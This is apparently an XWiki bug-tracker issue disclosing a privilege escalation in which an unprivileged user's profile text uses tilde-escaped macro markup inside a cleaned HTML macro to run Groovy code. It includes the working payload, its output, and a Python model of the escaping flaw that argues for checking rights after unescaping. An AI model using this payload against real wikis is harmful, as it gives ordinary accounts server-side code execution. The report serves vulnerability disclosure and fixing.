XWiki Platform

XWIKI-20327: Privilege escalation (PR) from account through XWiki syntax injection in cleaned HTML macro


    Description

      Steps to reproduce:

      As a user without script or programming rights, edit the about section of your user profile and include

      {{html wiki="true"}}~{~{~/~h~t~m~l~}~}~ ~{~{~c~a~c~h~e~}~}~{~{~g~r~o~o~v~y~}~}~p~r~i~n~t~l~n~(~1~)~{~{~/~g~r~o~o~v~y~}~}~{~{~/~c~a~c~h~e~}~}~{{/html}}
      

      Expected result:

      The user profile is normally displayed with an error that Groovy couldn't be executed.

      Actual result:

      1</p>{{/html}}</dd>
      

      is displayed, followed by further raw HTML code, showing that the Groovy macro has been executed. This demonstrates a privilege escalation attack from account to programming rights. This attack is similar to XWIKI-20313 but instead of attacking UIX execution, this attacks the display of rich text properties. Note that with HTML comments, full unfiltered Groovy code could be introduced, but I assume that using features like GroovyShell#evaluate, further code could also be easily interpreted from a URL parameter without requiring characters that are lost due to the HTML sanitizer (didn't test).
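The payload above relies on `~`, the escape character of XWiki 2.x syntax: every `{{` of the macro markup is written as `~{~{`, so any pass that inspects the HTML macro body before the wiki parser unescapes it sees no macro syntax at all, while the parser that runs afterwards sees `{{groovy}}`. The following model is an added illustration and not XWiki's code; the regex macro scan and the `SCRIPT_MACROS` set are assumptions made for the demonstration, and the only XWiki fact it relies on is that `~` makes the next character literal.

```python
import re

ESCAPE = "~"

# Constructed from the payload in the issue: the inner content of the
# {{html wiki="true"}} macro, with every character prefixed by '~'.
PAYLOAD = ("~{~{~/~h~t~m~l~}~}~ ~{~{~c~a~c~h~e~}~}~{~{~g~r~o~o~v~y~}~}"
           "~p~r~i~n~t~l~n~(~1~)~{~{~/~g~r~o~o~v~y~}~}~{~{~/~c~a~c~h~e~}~}")

# Illustrative set of macros that require script or programming rights
# (assumption for the model, not a list taken from XWiki).
SCRIPT_MACROS = {"groovy", "velocity", "python", "script"}

# Matches an opening or closing macro marker and captures the macro name.
MACRO_RE = re.compile(r"\{\{/?([A-Za-z][A-Za-z0-9]*)")


def xwiki_escape(text: str) -> str:
    """Prefix every character with '~', the way the payload was built."""
    return "".join(ESCAPE + ch for ch in text)


def xwiki_unescape(text: str) -> str:
    """Model of XWiki 2.x escaping: '~' makes the next character literal.

    A trailing lone '~' is dropped; everything else passes through unchanged.
    """
    out = []
    i = 0
    while i < len(text):
        if text[i] == ESCAPE:
            if i + 1 < len(text):
                out.append(text[i + 1])
            i += 2
        else:
            out.append(text[i])
            i += 1
    return "".join(out)


def macros_in(text: str) -> set:
    """Names of all macros whose markers appear in the text."""
    return set(MACRO_RE.findall(text))


def check_before_unescape(body: str) -> set:
    """Broken ordering: scan the raw body. The escaped form never contains
    an adjacent '{{', so the scan reports no script macros."""
    return macros_in(body) & SCRIPT_MACROS


def check_after_unescape(body: str) -> set:
    """Scan the text the wiki parser will actually render."""
    return macros_in(xwiki_unescape(body)) & SCRIPT_MACROS


if __name__ == "__main__":
    print(xwiki_unescape(PAYLOAD))
    print("scan before unescape:", check_before_unescape(PAYLOAD))
    print("scan after unescape: ", check_after_unescape(PAYLOAD))
```

The scan stands in for whatever inspects the macro content in an earlier pass (an HTML cleaner in the case of this issue); the point carried over from the report is that the text reaching the renderer after `~` unescaping is not the text that earlier pass saw, so any decision about which rights apply to the content has to be taken on the unescaped form, or the content has to be rendered with the rights of the user who wrote it.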

People: Michael Hamann